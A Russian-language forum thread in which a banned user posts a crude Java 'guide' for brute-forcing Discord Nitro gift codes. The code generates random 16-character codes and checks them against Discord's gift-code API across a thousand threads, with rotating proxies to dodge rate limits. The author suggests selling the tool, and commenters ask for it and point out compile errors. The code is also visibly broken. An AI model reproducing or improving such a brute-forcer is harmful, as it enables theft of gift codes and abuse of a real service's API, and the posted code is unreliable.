(Java) как брутить дискорд нитро

• Автор темы Автор темы Nordia
  • Дата начала Дата начала
yougame.biz/threads/120952/
Забаненный
Забаненный
Статус
Оффлайн
Реакции
101
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
мой первый гайд не судите строго!!!

вот што нам понадобица

Java:
Expand Collapse Copy
private static List<String> proxy = new ArrayList<>();
private static Executor executor = new ThreadPoolExecutor(1000, 1000, 0L, TimeUnit.MILLISECONDS, new LinkedBlockingQueue<>(1000), new ThreadPoolExecutor.CallerRunsPolicy()); // МУЛЬТИПОТОЧНОСТЬ, ХАЙП!!!!1111111
private static char[] chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray();

ну думаю справедливо будет не тупо фигачить код а разбить его на методы ну чтош начнем

первым делом спастим метод который будет генерировать кодики (пасчу не я а вы ну с этого гайда правда он офк никому нахуй не сдался я его пишу просто от нехуй делать)

Java:
Expand Collapse Copy
public static String getCode() {
    StringBuilder builder = new StringBuilder();

for (int i = 0; i < 16; i++) {
        builder.append(chars[ThreadLocalRandom.current().nextInt(chars.length]);
    }

return builder.toString();
}

теперь спиздим метод который будет реквестик отправлять и возвращать ответик

Java:
Expand Collapse Copy
public static JSONObject sendRequest(String[] proxy, String code) {
    CloseableHttpClient client = HttpClients.custom()
        .setProxy(new HttpHost(proxy[0], proxy[1]))
        .build();

CloseableHttpResponse response = client.execute(new HttpGet("https://discordapp.com/api/v6/entitlements/gift-codes/" + code + "?with_application=false&with_subscription_plan=true"));

JSONObject object = (JSONObject) new JSONParser().parse(String.join("", IOUtils.readLines(response.getEntity().getContent())));

client.close();
    response.close();

return object;
}

ну типерь дело за малым :orehus: ебашим нахуй паблик стактик ваоид мейн стринг аргс
Java:
Expand Collapse Copy
public static void main(String[] args) {
    while (true) { // ну а хули ебать
        executor.execute(() -> {
            String code = getCode();

JSONObject response = sendRequest(proxy.get(ThreadLocalRandom.current().nextInt(proxy.size())).split(":"), code);

String message = (String) response.get("message");

if (!message.equals("Unknown Gift Code") && !message.equals("service not exists") && !message.equals("You are being rate limited.")) {
                System.out.println(code + " можна подарить девачьке =3");
            }
        });
    }
}

теперь можно идти продавать свою прогу за дохуя рублей в месяц :da:
скорость- милиард запросов в секунду

p.s. не удаляйте тему пожалуста:FeelsBadMan:

ну или удаляйте:roflanPominki:

Последнее редактирование:
Дай саму прогу

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Вот какой функции не хватало в Features к кряку, пока ты играешь будет брутится нитро, сча пойду спащу :roflanEbalo:

Ну что работает? Хотя смысл спрашивать. И по коду понятно, что +/- должно. Мне одно непонятно как ты до этого додумался. Бонально спиз.... API и проверять каждый код на его валидность....
ГЕНИАЛЬНО...

Ну что работает? Хотя смысл спрашивать. И по коду понятно, что +/- должно. Мне одно непонятно как ты до этого додумался. Бонально спиз.... API и проверять каждый код на его валидность....
ГЕНИАЛЬНО...
Ну так работают все генераторы нитро ,не?

Ну так работают все генераторы нитро ,не?
Камон это мой первый генератор nitro будит. Я раньше не задовался этой темой, даже. И мало того что мой первый генератор так и моя первая прога на jave.

Дай прогу

мои познания в Jave дают возножность вставить данный код в компилятор. После чего у меня - глаза ,ибо я вижу чудную картину с ошибками в "моей голове".....
Это клиника...
1589350773968.png

мои познания в Jave дают возножность вставить данный код в компилятор. После чего у меня - глаза ,ибо я вижу чудную картину с ошибками в "моей голове".....
Это клиника...Посмотреть вложение 73981
во первых ты скобочку проебал в методе sendRequest, во вторых это не будет работать тк лист с проксями пустой, в третих в sendRequest надо ретурнить не result а object

Чел, ты гений, спасибо.

Гении в дискорде работают, если что дискорд генерирует нитро при покупке

Назад
Сверху Снизу